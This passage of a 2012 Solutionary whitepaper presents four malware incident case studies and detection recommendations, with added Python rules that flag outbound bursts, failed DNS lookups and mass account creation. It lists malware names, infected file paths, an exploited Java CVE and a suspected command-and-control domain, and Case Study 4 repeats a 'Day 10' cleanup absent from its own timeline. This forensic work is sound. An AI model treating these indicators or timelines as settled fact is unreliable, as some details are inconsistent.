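            dq.popleft()
        if len(dq) >= threshold:
            peaks[(src, dst)] = max(peaks.get((src, dst), 0), len(dq))
    return peaks


def detect_denied(lines, threshold=10) -> dict:
    """Map (src, dst) -> number of denied outbound attempts, for pairs at or above threshold."""
    counts = Counter((src, dst) for _ts, src, dst, action in parse_log(lines) if action == "deny")
    return {pair: n for pair, n in counts.items() if n >= threshold}


if __name__ == "__main__":
    log = build_sample_log()
    for (src, dst), n in detect_bursts(log).items():
        print(f"burst: {src} -> {dst}: {n} requests within 60 s")
    for (src, dst), n in detect_denied(log).items():
        print(f"denied: {src} -> {dst}: {n} blocked attempts")
```

The burst rule keys on the pair (source, destination) rather than on the source alone, so a workstation that is merely busy does not trip it; the denied-connection rule is the cheaper of the two and needs only the firewall's own log, which in this case already existed but was not read.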
Apart from these detection failures, Solutionary identified numerous additional unsafe practices in the environment, including:

Inadequate Incident Response – This organization did not have effective incident response procedures in place. They were unable to effectively detect the attack, and when they were alerted to the incident, they were not able to effectively identify and clean compromised systems.

Secure Credential Distribution (recommended for all organizations) – One of the user PCs infected by the zero-day attack was used to distribute partner bank credentials via plain-text email. As a result, it is possible that access to user accounts was actually accomplished via snooping into user email archives on the infected PC. Passwords should only be distributed in person, over the phone, or via encrypted email. They should never be sent via plain-text e-mail.

Anomalous Transaction Monitoring (recommended for known APT targets) – More rigorous monitoring of anomalous transactions would very likely have detected these transactions much earlier. The customer's partner bank was able to identify these transactions as anomalous, but the customer did not.

System Patching and Hardening (recommended for all organizations) – While this organization had an automated patch management solution in place, validation that patches were successfully installed was not occurring. As a result, missing patches on PCs were not detected. Solutionary identified that PCs involved in the infection had not been patched for over 6 weeks prior to their infection. It is possible that the initial infection occurred via exploitation of an unpatched vulnerability on those systems.

Data Destruction/Cleanup (recommended for known APT targets) – Hundreds of potentially sensitive documents, containing financial and personnel information, were discovered on the compromised systems. It is not known whether the attackers accessed and/or plan to utilize this information. Additionally, certain systems reviewed by Solutionary had over 20 user profiles on the hard drive. While shared resources are common in corporate environments, on critical devices the number of authorized users should be kept to a minimum. These devices should be reviewed on a regular basis to ensure that outdated documents, browser cache files, and unused profiles are purged from the system.

Appropriate Use of Critical Systems (recommended for all organizations) – While corporations typically permit a limited amount of personal use of company systems, this policy should not necessarily extend to systems that access critical financial applications, or maintain extremely sensitive data. In this case study, devices that were used for large-scale wire transfers and authorizations were also used for accessing personal websites, personal email, and media storage. It is possible that the infection originated from a user conducting personal business on a mission-critical device.
Case Study 2 – Zero-Day Infection

Introduction
This case study involves the post-incident investigation of a breach at a large marketing corporation.

Incident Timeline – Case Study 2
Day 1 – Undetected zero-day infection in network.
Day 10 – Anti-virus vendor releases signature for zero-day attack.
Day 10 – Zero-day detected, and cleaned from network with assistance of anti-virus vendor.
Days 10-14 – Fake accounts created by Authorized User #1 and Authorized User #2 on Enterprise system.
Day 20 – Fake accounts created by Authorized User #2 are used to send a fake e-mail campaign from the customer network. 17 million e-mails were generated using these fake accounts.
Day 44 – Fake accounts created by Authorized User #2, Authorized User #3, and stolen credentials of Authorized User # used to send a fake e-mail campaign from customer network. E-mail campaign contained a link that installed a virus.
Day 45 – Incident identified by customer. Authorized User #2, Authorized User #3, Authorized User #4 systems all taken off-line and replaced.
Day 45 – Another campaign created from a different IP address via same method.
Day 46 – FBI contacted.
Day 46 – Another fake e-mail campaign created using Authorized User #4's new credentials on Authorized User #5's system.
Day 47 – Fake account created by Authorized User #6.
Day 80 – Solutionary contacted.
Incident Analysis
Solutionary was not involved in the immediate investigation into this incident, and as a result, did not have access to all relevant data. However, Solutionary's forensic investigation into the incident identified a number of factors leading to the successful compromise and persistent use of the target's network by attackers:
Incident Response – In this case study, it appeared that development personnel were aware of malicious activity occurring in the environment (in Days 1-45), but did not notify information security personnel. As a result, this incident continued to escalate until FBI notification was required. This is also a case where the initial means of infection (malware using a zero-day attack) was used to gain access to the environment, and from that point, the attacker gained access to numerous additional systems, gaining a foothold in the environment. As a result, when the zero-day infection was detected and cleaned on Day 10, it had no effect on the attacker, who had already developed numerous other avenues to access the environment.
System Patching and Hardening (recommended for all organizations) – While it's possible that an attack will use a zero-day exploit for which no patch exists, it is far more likely that attackers will first attempt to exploit previously identified vulnerabilities, with known exploits. While the exact mechanism of distribution of the zero-day that infected the network is unknown, one of the Authorized User hard drives had not been patched for over six months prior to the successful compromise, and another Authorized User hard drive had not been patched for over 10 months prior to the compromise. There is a strong possibility that the initial distribution of the virus took advantage of the missing patches on these machines.
Sensitive User Auditing (recommended for possible APT targets) – During the course of the incident, the attacking party used valid user credentials to create numerous fraudulent accounts on multiple systems, in order to conduct attacks without being detected. Detailed auditing and monitoring of user and permission changes would likely have alerted the organization to this activity much earlier.
Data Destruction/Cleanup (recommended for known APT targets) – Certain devices reviewed by Solutionary had over 20 user profiles on the hard drive. While shared resources are common in corporate environments, on critical devices, the number of authorized users should be kept to a minimum. Additionally, these devices should be reviewed on a regular basis to ensure that outdated documents, browser cache files, and unused profiles are purged from the system.
Appropriate use of critical systems (recommended for all organizations) – While corporations typically permit a limited amount of personal use of company systems, this policy should not necessarily extend to users who access critical financial applications, or maintain extremely sensitive data on their systems. In this instance, devices that had access to customer information, and had the ability to create mass e-mail campaigns, were also used by users for accessing personal websites, personal email, and media storage. It is possible that the infection originated by a user conducting personal business on a mission-critical device.
Case Study 3 – Dropper/Sinowal Infection

Introduction
This case study involves the cursory analysis of a malware infection at a regional commercial bank. This organization was an existing Solutionary ActiveGuard monitoring client. This case study provides an effective demonstration of the necessity of multiple control methods in modern network environments.

Incident Timeline – Case Study 3
Day 1 – The Solutionary SOC escalated an ActiveGuard Alert to customer, identifying unusual activity originating from a PC that was receiving numerous ICMP Type 3 Code 3 (Destination Port Unreachable) messages from a host at ThePlanet.com Internet Services, Inc.
Day 1 – Solutionary's customer initiated research for the Alert. The investigation resulted in the following:
- Local virus scanning showed no infection
- No unusual software was identified installed on the device
- No unusual DNS entries were hard coded onto the device
- A review of installed software has not returned anything unusual
- Firewall logs showed repetitive activity to an unknown host
- Firewall logs showed repetitive activity to ftsgvvkd.com – this domain was registered eleven days prior to the original infection and the registrar is ONLINENIC.COM – some research shows that this registrar is associated with malicious sites
- A check of the local cache on the host was clear
- A check of the static "hosts" file entries on the box was clear
- A MalwareBytes scan of the host was clear
After this review, Solutionary's customer closed the Alert.
Day 7 – The Solutionary SOC escalated an ActiveGuard Alert to customer identifying additional unusual activity on the same PC, including attacks against key servers on the network, and attempts to contact command and control systems.
Day 18 – Affected device removed from the network and forwarded to Solutionary for analysis.
Day 19 – Solutionary performs initial analysis of hard drive, which reveals existence of numerous zero-day malware infections.

Incident Analysis
The first step in the Data Analysis component of Solutionary's Incident Response and Forensic framework is to use a group of automated commercial and open-source tools to analyze the media relevant to the investigation. The tools used in each analysis are dependent upon the type of system being analyzed, the types of security controls known to be in place in the customer environment, and information about the type of incident that has occurred. There are a number of reasons Solutionary uses automated tools in this first analysis phase:
Identification of Technology Effectiveness – Detection of malware by software in the Solutionary toolkit that was undetectable by technologies in the customer environment can identify necessary security technologies for the client environment.
Future Detection – Software in the Solutionary toolkit that detects a virus/Trojan/malware can be used by clients for investigation of future similar incidents in the environment, as well as to validate the current infection status of other devices in the environment.
Economy of Testing – Manual reviews of sophisticated malware attacks can be time-consuming, and require considerable experience and expertise. By performing faster, lower-cost scans as a first step in the analysis process, Solutionary is able to gather potentially important information that can be used to facilitate the manual review process. In some instances, automated testing may provide sufficient information to make manual testing unnecessary.
Upon receipt of the infected system hard drive, Solutionary ran a number of standard automated anti-virus and anti-malware applications against the suspect drive.
Case Study 3 – Automated Analysis Results
Tool | Identified Issue | Location
Anti-virus Vendor 1 | Trojan.JS.Redirector.le | C:/Documents and Settings/HelpuserAssistant/Local Settings/Temporary Internet Files/Content.IE5/1L8MV0E6/cd[1].htm
Anti-virus Vendor 1 | Trojan-Dropper.Java.Agent | C:/Documents and Settings/LocalService/Local Settings/Temporary Internet Files/Content.IE5/KCOAEQT7/JnteZAVORP1KAV1[1].htmlZxU230d9c2eHffdf939bV0100f080006R45bae1e7102Tb3d5dfb4201l0409325/Main.class
Anti-virus Vendor 1 | Win32/Sinowal | C:/Documents and Settings/LocalService/Local Settings/Temporary Internet Files/Content.IE5/KCOAEQT7/JnteZAVORP1KAV1[1].htmlZxU230d9c2eHffdf939bV0100f080006R45bae1e7102Tb3d5dfb4201l0409325/i.da
Anti-virus Vendor 2 | Trojan.Agent/Gen | C:/WINDOWS/CSC/D8/800000057
Anti-virus Vendor 3 | Trojan-Dropper.Java.Agent | C:/Documents and Settings/LocalService/Local Settings/Temporary Internet Files/Content.IE5/KCOAEQT7/JnteZAVORP1KAV1[1].htmlZxU230d9c2eHffdf939bV0100f080006R45bae1e7102Tb3d5dfb4201l0409325/Main.class
Anti-virus Vendor 3 | Win32/Sinowal | C:/Documents and Settings/LocalService/Local Settings/Temporary Internet Files/Content.IE5/KCOAEQT7/JnteZAVORP1KAV1[1].htmlZxU230d9c2eHffdf939bV0100f080006R45bae1e7102Tb3d5dfb4201l0409325/i.dat
Anti-virus Vendor 3 | TR/Spy.28672.333 | C:/WINDOWS/CSC/d4/800000C3
Anti-virus Vendor 3 | TR/Dropper.Gen | C:/WINDOWS/CSC/d5/800000D4
Anti-virus Vendor 3 | TR/Dropper.Gen | C:/WINDOWS/CSC/d6/800000B5
Anti-virus Vendor 4 | Gen.Trojan.Heur!IK | C:\WINDOWS\CSC\d4\800000C3
Anti-virus Vendor 4 | Riskware.NetTool.AngryIP!IK | C:\WINDOWS\CSC\d8\80000057
Anti-virus Vendor 4 | Trojan.Win32.VB!IK | C:\WINDOWS\system32\CCM\Cache\STO00011.1.System\lmib.msi/PO1_278D453034324203BFEBD7D78B3059C7_3C269F0422E76F42388B480A8F99CED78C
Anti-virus Vendor 5 | No Findings of Interest | No Findings of Interest
Anti-virus Vendor 6 | No Findings of Interest | No Findings of Interest
Anti-virus Vendor 7 | No Findings of Interest | No Findings of Interest
Anti-virus Vendor 8 | No Findings of Interest | No Findings of Interest
Anti-virus Vendor 9 | No Findings of Interest | No Findings of Interest
Anti-virus Vendor 10 | No Findings of Interest | No Findings of Interest
Anti-virus Vendor 11 | No Findings of Interest | No Findings of Interest
Manual Review | Trojan program Exploit.Java.CVE-2010-0094.x | sda1/Documents and Settings/user/Application Data/Sun/Java/Deployment/cache/6.0/34/c669a2-5ca1bd02.vir//vmain.class
Manual Review | Trojan program Exploit.Java.CVE-2010-0094.x | sda1/Documents and Settings/user/Application Data/Sun/Java/Deployment/cache/6.0/34/c669a2-5ca1bd02.vir//vload.class
Manual Review | Backdoor.Win32 | /dev/sda
Manual Review | Keylogger | C:\WINDOWS\system32\calcsn32.
The results of this analysis demonstrate a significant discrepancy in the results of different anti-virus scanners/rescue CDs – four scanners identified malware applications on the system, and seven found no problems. These results clearly demonstrate one of the primary focuses of this document – while virus scanning is an important component of a security program, this alone is insufficient to protect against modern malware, and should be only one part of a multi-faceted strategy to protect against malicious threats. In this case, the Solutionary customer was fortunate, as Intrusion Detection System alerts detected anomalous activity from the device, and instigated the investigation that eventually identified malware on the device. Implementation of a multifaceted detection and control strategy is critical to ensure malware evading one technology's detection has the potential to be detected by another technology in the environment.
Case Study 4 – Infection

Introduction
This case study involves the investigation of an incident at a Software as a Service (SaaS) provider. This incident demonstrates a common pattern that Solutionary has observed in a number of incidents: multiple systems are compromised using a variety of techniques, so that elimination of the initial malware infection has no impact on the attacker, who has numerous other mechanisms to access the environment.
Incident Timeline - Case Study 4
Day 1 – User PC infected via unknown origin, likely via a web browser vulnerability.
Day 1 (3:20 PM) – Malicious files vmain.class and vload.class are created. The machine was continuously infected with multiple infections after this time.
Day 1 (5:05 PM) – Known malicious file C:\Windows\Temp\twko\setup.exe is created.
Day 2 (7:00 AM) – Symantec discovers C:\Documents and Settings\networkservice\local settings\application data\ktl.exe
Day 3 – Symantec discovers multiple infections on the machine.
Day 3 (8:48 AM) – C:\WINDOWS\Temp\bdwp\setup.exe is created on the machine – this application begins to capture account credentials posted to HTML forms on the system.
Day 3 (12:26 PM) – C:\WINDOWS\system32\calcsn32.dll is created on the machine.
Day 7 (9:10 AM) – Known malicious file C:\WINDOWS\Temp\otmw\setup.exe is created on the machine
Day 7 (4:00 PM) – User #1 logs into production application from infected PC.
Day 8 (7:05 AM) – Attacker uses User #1's credentials to log into production application.
Day 8 (7:32 AM) – Attacker creates a fake user account on production system.
Day 8 (7:34 AM) – Attacker modifies fake user account permissions.
Day 8 (7:38 AM) – Attacker creates another fake user account on production system.
Day 8 (7:39 AM) – Attacker creates another fake user account on production system.
Day 120 – Attacker creates another fake user account on production system.
Incident Analysis
Incident Response – This is a case where the initial means of infection was used to gain access to the environment, and from that point, the attacker gained access to numerous other systems, gaining a foothold in the environment. As a result, when the initial infection was detected and cleaned on Day 10, it had no effect on the attacker, who had already developed numerous other avenues to access the environment.

Case Study Conclusions and Recommendations
The case studies discussed above highlight a number of simple, low-cost practices that organizations can implement to improve detection of malware infections, and respond to them.
Use Rescue Disks for Validation – Modern malware often has the capability to defend itself against detection by anti-virus. Additionally, it can hide itself in locations not scanned, or not accessible to anti-virus software. As a result, virus scanning of potentially infected devices should be performed using "rescue disks", which run while the operating system (and any malware) is inactive, increasing the possibility of detection. Different vendors have better detection mechanisms in place for different types of malware, so Solutionary recommends having rescue disks from at least three vendors available for analysis.
Closely Monitor Network Re-entry of Disinfected Devices - Disinfected devices should be closely monitored for one to two weeks after being cleaned. As the case studies demonstrate, anti-virus software cannot be relied on to detect all malware existing on a device. Additionally,
When in Doubt, Rebuild – In situations where there is any doubt as to whether an infection has been effectively removed from a system, rebuild the system from a corporate image to ensure removal of malicious software.
Effectively Use Existing Security Technologies – Where security technologies are in place in an environment, ensure they are being used effectively. This includes implementation of appropriate configurations, and, just as importantly, effective monitoring of event logs from these technologies. Anomalous event logs from devices that are not specifically designed to detect malware, such as firewall drops and Websense logs, can identify the existence of malicious software in the environment.
Monitor Key Non-Security Technologies – Effective monitoring of non-security technologies can also provide potential evidence of APT/malware incidents. DNS logs are a key example of this – when malware is introduced to an environment, it needs to connect back to command and control systems to receive further instructions. Often, these command and control systems are reached by the malware iterating through a list of preconfigured domain names. In many instances, these domains have been taken off-line, or banned. When that is the case, it is possible for DNS servers to log numerous consecutive failed query attempts from infected systems. Monitoring of such logs can be indicative of a malware infection in the environment.
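A detection rule for the failed-query pattern just described, added here as an illustrative example and not part of the Solutionary whitepaper. The log line format and the sample entries are constructed; the rule alerts only on a run of consecutive failures for distinct names from one client, so an isolated typo or a slow trickle of NXDOMAINs does not fire.

```python
"""Flag hosts that iterate through a list of dead command and control domains:
a run of consecutive failed DNS lookups (NXDOMAIN/SERVFAIL) for distinct names
from a single client within a short window."""
from collections import defaultdict
from datetime import datetime, timedelta
import re

# Constructed sample log (not from the whitepaper). Assumed line format:
#   <ISO timestamp> client=<ip> qname=<name> rcode=<NOERROR|NXDOMAIN|SERVFAIL>
SAMPLE_LOG = """\
2012-01-17T09:00:01 client=10.0.0.5 qname=www.example.com rcode=NOERROR
2012-01-17T09:00:02 client=10.0.0.7 qname=qx1a.example.net rcode=NXDOMAIN
2012-01-17T09:00:02 client=10.0.0.7 qname=qx1b.example.net rcode=NXDOMAIN
2012-01-17T09:00:03 client=10.0.0.7 qname=qx1c.example.org rcode=SERVFAIL
2012-01-17T09:00:03 client=10.0.0.7 qname=qx1d.example.org rcode=NXDOMAIN
2012-01-17T09:00:04 client=10.0.0.7 qname=qx1e.example.net rcode=NXDOMAIN
2012-01-17T09:00:05 client=10.0.0.5 qname=typo.example.com rcode=NXDOMAIN
2012-01-17T09:00:06 client=10.0.0.5 qname=mail.example.com rcode=NOERROR
2012-01-17T09:05:00 client=10.0.0.9 qname=a.example.net rcode=NXDOMAIN
2012-01-17T09:20:00 client=10.0.0.9 qname=b.example.net rcode=NXDOMAIN
2012-01-17T09:40:00 client=10.0.0.9 qname=c.example.net rcode=NXDOMAIN
"""

LINE_RE = re.compile(r"^(\S+) client=(\S+) qname=(\S+) rcode=(\S+)$")
FAILED_RCODES = {"NXDOMAIN", "SERVFAIL"}


def parse_log(text):
    """Yield (timestamp, client, qname, rcode) tuples; malformed lines are skipped."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            yield datetime.fromisoformat(m.group(1)), m.group(2), m.group(3), m.group(4)


def find_failed_query_bursts(text, min_run=4, window=timedelta(minutes=5)):
    """Return {client: sorted distinct failed names} for every client whose
    consecutive queries (in log order) failed for at least `min_run` distinct
    names inside `window`. A successful answer resets that client's run."""
    runs = defaultdict(list)   # client -> [(timestamp, qname)] of the current failed run
    alerts = {}
    for ts, client, qname, rcode in parse_log(text):
        if rcode not in FAILED_RCODES:
            runs[client].clear()     # a resolved name breaks the run
            continue
        # Age out failures older than the window so background noise does not accumulate.
        run = [(t, q) for t, q in runs[client] if ts - t <= window]
        run.append((ts, qname))
        runs[client] = run
        distinct = sorted({q for _, q in run})
        if len(distinct) >= min_run:
            alerts[client] = distinct
    return alerts


if __name__ == "__main__":
    for client, names in find_failed_query_bursts(SAMPLE_LOG).items():
        print(f"{client}: {len(names)} consecutive failed lookups: {', '.join(names)}")
```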
Develop Effective Auditing and Monitoring for Custom Applications – In situations where an advanced attacker has established a foothold in an environment, knowledge of the functionality of customer internal applications can be easily obtained. The case studies above demonstrate this, where custom applications were used to submit transactions and send out e-mail marketing campaigns. It is important for custom applications performing sensitive functions to have granular logging capabilities, and anomalous activity in these applications should generate alerts that are reviewed and investigated by administrators.
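An audit rule of the kind this recommendation and the Sensitive User Auditing finding in Case Study 2 call for, added here as an example and not code from Solutionary or its customers. It works over a constructed application audit log shaped like the Case Study 4 timeline (a login with valid credentials from a new address, then several account creations and a permission change within minutes); the event format, actor names and addresses are assumptions.

```python
"""Alert when one account creates or re-permissions several user accounts inside a
short window, and record whether it did so from a source address that account
only started using recently."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed audit events modelled on the Case Study 4 timeline (not a real log).
# Fields: (timestamp, actor, action, target, source_ip)
SAMPLE_EVENTS = [
    ("2012-01-07T16:00:00", "user1", "login", "-", "10.1.1.20"),           # usual workstation
    ("2012-01-08T07:05:00", "user1", "login", "-", "203.0.113.44"),        # same credentials, unfamiliar address
    ("2012-01-08T07:32:00", "user1", "create_user", "svc_report", "203.0.113.44"),
    ("2012-01-08T07:34:00", "user1", "modify_permissions", "svc_report", "203.0.113.44"),
    ("2012-01-08T07:38:00", "user1", "create_user", "svc_backup", "203.0.113.44"),
    ("2012-01-08T07:39:00", "user1", "create_user", "svc_sync", "203.0.113.44"),
    ("2012-01-08T09:00:00", "admin", "login", "-", "10.1.1.5"),
    ("2012-01-08T09:10:00", "admin", "create_user", "newhire", "10.1.1.5"),  # routine single provisioning
]

SENSITIVE_ACTIONS = {"create_user", "modify_permissions"}


def audit_account_changes(events, threshold=3, window=timedelta(minutes=30),
                          new_source_age=timedelta(hours=24)):
    """Return one alert dict per actor whose sensitive actions reach `threshold`
    inside `window`. `from_new_source` is True when any of those actions came from
    an address the actor first appeared at less than `new_source_age` earlier."""
    first_seen = {}               # (actor, ip) -> first timestamp that pair appeared
    recent = defaultdict(list)    # actor -> sensitive events still inside the window
    alerts, alerted = [], set()
    for ts_s, actor, action, target, ip in sorted(events):   # ISO timestamps sort correctly
        ts = datetime.fromisoformat(ts_s)
        first_seen.setdefault((actor, ip), ts)
        if action not in SENSITIVE_ACTIONS:
            continue
        recent[actor] = [e for e in recent[actor] if ts - e[0] <= window]
        recent[actor].append((ts, action, target, ip))
        if len(recent[actor]) >= threshold and actor not in alerted:
            alerted.add(actor)    # one alert per actor, the rest is for the analyst
            alerts.append({
                "actor": actor,
                "first_change": recent[actor][0][0].isoformat(),
                "targets": sorted({e[2] for e in recent[actor]}),
                "from_new_source": any(
                    ts - first_seen[(actor, e[3])] <= new_source_age for e in recent[actor]
                ),
            })
    return alerts


if __name__ == "__main__":
    for alert in audit_account_changes(SAMPLE_EVENTS):
        print(alert)
```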
About Solutionary
Solutionary reduces the information security and compliance burden by delivering flexible managed security services that align and enhance client goals, existing security programs, infrastructure and personnel. The company's services are based on experienced security professionals, data-driven and actionable threat intelligence and the ActiveGuard service platform, which provides expert security and compliance management. Solutionary works as an extension of clients' internal teams, providing industry-leading customer service, patented technology, thought leadership, years of innovation and proprietary certifications that exceed industry standards. This client focus and dedication to customer service has enabled Solutionary to boast one of the highest client retention rates in the industry. Solutionary provides 24/7 services to mid-market and global, enterprise clients through two security operations centers (SOCs) in North America.
For more information, contact Solutionary at: info@solutionary.com or 866-333-2133
ActiveGuard US Patent Numbers: 7,168,093; 7,424,743; 6,988,208; 7,370,359; 7,673,049.
Solutionary, the Solutionary logo, ActiveGuard, the ActiveGuard logo, are registered trademarks or service marks of Solutionary, Inc. or its subsidiaries in the United States. Other marks and brands may be claimed as the property of others. The product plans, specifications, and descriptions herein are provided for information only and subject to change without notice, and are provided without warranty of any kind, express or implied.
Copyright 2012 Solutionary, Inc.
Solutionary, Inc., 9420 Underwood Ave., 3rd Floor, Omaha, NE 68114
